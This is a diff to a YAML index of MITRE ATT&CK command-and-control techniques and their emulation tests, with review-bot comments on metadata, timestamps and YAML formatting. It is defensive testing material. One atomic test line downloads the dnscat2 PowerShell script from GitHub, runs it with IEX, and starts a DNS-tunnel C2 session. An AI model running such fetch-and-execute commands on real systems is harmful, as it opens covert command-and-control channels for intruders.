- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
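Review bot: the tail of this hunk removes `x_mitre_data_sources` (`Network Traffic: Network Traffic Flow`), `x_mitre_permissions_required` (`User`), `x_mitre_is_subtechnique: true` and `x_mitre_version: '1.0'` from the Domain Generation Algorithms object, but the only `+` lines visible here re-add the external references, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0`. If the regenerated object re-emits those four fields earlier in the hunk (the reordered top of the object is outside this view), fine; if not, the entry silently loses its data-source and version metadata while the sibling T1071.005 object added later in this patch carries both, so please confirm before merging.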
@@ -75242,7 +75665,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests:
- name: DNS Large Query Volume
@@ -75369,6 +75791,65 @@ command-and-control:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
name: powershell
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
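Review bot: the new T1071.005 `description` scalar is split at the protocol list into lines that carry no `+` prefix (`, XMPP`, `,`, `, and STOMP`, `use a publish/subscribe design,`), which suggests inline markup around the protocol names was lost when the change was rendered; check that the committed YAML holds the sentence as one double-quoted string with the markup intact, since unprefixed lines inside a hunk would also make the patch fail to apply. Also note `x_mitre_detection: ''` is empty while `x_mitre_data_sources` lists Network Traffic Flow and Content, so the generated index will show an empty detection section for this sub-technique; that mirrors the upstream entry, but it is worth a sentence in the PR description.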
@@ -75414,7 +75895,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -75446,7 +75926,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
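Review bot: `modified` moves backwards here (`2021-04-29T14:49:39.188Z` to `2020-03-27T16:10:37.183Z`), and the same regression appears in later hunks for T1205, T1572, T1090, T1568, T1102.003, T1568.003, T1104, T1205.001 and T1573.002, all from old values ending in `.188Z` at `14:49:39` or `14:00:00`. Those old stamps look bulk-set by an earlier import rather than taken from upstream; if that is the case, say so in the PR description, because any consumer that compares `modified` against a cached copy will treat these objects as older than what it already has and skip the update.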
@@ -75468,22 +75948,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -75505,7 +75983,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -75530,7 +76008,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests:
- name: Telnet C2
@@ -75652,7 +76129,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests:
- name: TeamViewer Files Detected Test on Windows
@@ -76106,11 +76582,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -76194,7 +76669,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -76225,7 +76699,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -76245,8 +76719,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
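Review bot: the link text for `https://attack.mitre.org/techniques/T1001/003` changes to `Protocol or Service Impersonation` while the URL stays the same, which matches the upstream rename of that sub-technique. Any remaining occurrences of the old `Protocol Impersonation` label in this file should be updated in the same pass so the index does not render two names for one technique ID.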
@@ -76268,8 +76742,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests:
- name: DNS over HTTPS Large Query Volume
@@ -76483,7 +76955,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -76531,7 +77002,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -76585,7 +77055,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -76618,7 +77087,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -76638,8 +77107,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -76677,7 +77144,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -76705,42 +77172,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -76749,17 +77196,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
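Review bot: this hunk drops `x_mitre_permissions_required: [User]` from T1102 with no replacement in the re-emitted object, yet the same patch keeps that field on T1568 (`- User` under `x_mitre_permissions_required` a few hunks up), T1205.001 and T1102.003. Either upstream has removed the field and those other entries will lose it on their next regeneration, or the generator is inconsistent about which fields it preserves; please state which, so the index does not end up with some techniques carrying the field and others not. The added `(Citation: Broadcom BirdyClient Microsoft Graph API 2024)` in the description has its matching `source_name` entry in `external_references`, so that part is consistent.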
@@ -76791,7 +77260,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -76808,8 +77277,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -76829,7 +77296,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -76852,8 +77319,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -76878,7 +77343,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -76903,8 +77368,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -76969,7 +77432,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -76993,7 +77455,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -77018,21 +77480,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
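Review bot: the T1090.003 `description` switches from a `|-` block scalar to a double-quoted folded scalar, which forces escapes such as `\n\n` and the `\ Protocols such as ICMP` at the line start; that escaped leading space yields two spaces after `(WAN).` in the parsed text, and `operations. (Citation: ORB Mandiant) ` puts a space before the citation, unlike every other `(Citation: ...)` in this file. Since the only substantive change is the added ORB sentence, keep the block-scalar style so the diff shows that sentence alone and no escaping is needed, and drop the stray spaces.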
@@ -77051,7 +77528,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -77065,6 +77542,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -77078,7 +77560,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests:
- name: Psiphon
@@ -77219,7 +77700,7 @@ command-and-control:
name: sh
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -77269,11 +77750,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
